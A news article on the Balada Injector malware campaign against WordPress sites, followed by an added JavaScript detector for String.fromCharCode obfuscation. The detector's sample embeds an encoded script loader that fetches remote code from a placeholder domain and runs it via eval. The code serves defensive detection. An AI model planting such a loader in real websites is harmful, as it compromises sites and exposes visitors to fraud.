
More than a million WordPress sites infected with new malware

4:41 pm, April 10, 2023

According to cybersecurity experts, more than a million WordPress-based websites have been infected as part of the Balada Injector malware campaign that has been going on since 2017. Such attacks are known to occur in waves — every few weeks.

"This campaign can be easily identified by the attackers' penchant for String.fromCharCode obfuscation (creating unreadable code), using recently registered domain names with malicious scripts on random subdomains, and redirecting to various fraudulent sites," experts say.

The sites used in the attacks include fake technical support, fraudulent lottery winnings, and fake CAPTCHAs that encourage users to enable notifications. This is how cybercriminals can send their spam ads. Over the past years, more than 100 domains have been used in the Balada Injector malware campaign.

The malware also allows attackers to generate fake WordPress administrator users, collect data stored on the underlying hosts, and leave backdoors for persistent access. In addition, Balada Injector is capable of performing large-scale searches in top-level directories associated with the compromised site's file system.

"Most often, these resources belong to the creator of the compromised site, and they all use the same server account, as well as the same file access rights. Thus, hacking only one site can potentially provide access to several other sites at once," cybersecurity experts say.

The experts recommended that WordPress users update their site software promptly, remove unnecessary plugins and themes, and use strong WordPress administrator passwords to reduce the risk.
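Site owners can look for the String.fromCharCode obfuscation the experts cite as a marker of this campaign in their theme and plugin files. The following is an added example, not code from the article or from the researchers; the sample markup and the `example.invalid` domain are constructed, and the 16-code threshold and keyword list are assumptions.

```javascript
// Flags String.fromCharCode(...) calls with long numeric argument lists and
// decodes them so a reviewer can see what the hidden code does.
const CALL_RE = /String\s*\.\s*fromCharCode\s*\(([^()]*)\)/g;
// Assumed indicators that decoded text loads or writes remote script.
const SUSPICIOUS_RE = /https?:\/\/|<script|createElement|\.src\s*=|document\.write/i;

// Returns the decoded string, or null if the arguments are not all
// numeric literals (decimal or 0x-prefixed hex).
function decodeArgs(argText) {
  const codes = argText.split(',').map(s => s.trim());
  if (!codes.every(s => /^(0x[0-9a-f]+|\d+)$/i.test(s))) return null;
  return String.fromCharCode(...codes.map(Number));
}

// Short calls (separators, single characters) are common in legitimate
// code, so only lists of at least minCodes character codes are reported.
function findCharCodeObfuscation(text, minCodes = 16) {
  const findings = [];
  for (const m of text.matchAll(CALL_RE)) {
    const decoded = decodeArgs(m[1]);
    if (decoded === null || decoded.length < minCodes) continue;
    findings.push({
      line: text.slice(0, m.index).split('\n').length,
      decoded,
      suspicious: SUSPICIOUS_RE.test(decoded),
    });
  }
  return findings;
}

// Constructed sample: a template file with two harmless uses and one
// encoded script loader pointing at a placeholder domain.
const payload = 'var s=document.createElement("script");' +
  's.src="https://a1b2c3.example.invalid/stat.js";document.head.appendChild(s);';
const encoded = Array.from(payload, c => c.charCodeAt(0)).join(',');
const SAMPLE = [
  '<?php get_header(); ?>',
  '<script>var sep = String.fromCharCode(44, 32);</script>',
  `<script>eval(String.fromCharCode(${encoded}));</script>`,
  '<script>document.title = String.fromCharCode(0x42, 0x6c, 0x6f, 0x67);</script>',
].join('\n');

for (const f of findCharCodeObfuscation(SAMPLE)) {
  console.log(`line ${f.line}: suspicious=${f.suspicious} decoded=${f.decoded}`);
}
```

A hit is a prompt for manual review of the file and its modification history, since some legitimate plugins also build strings this way.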
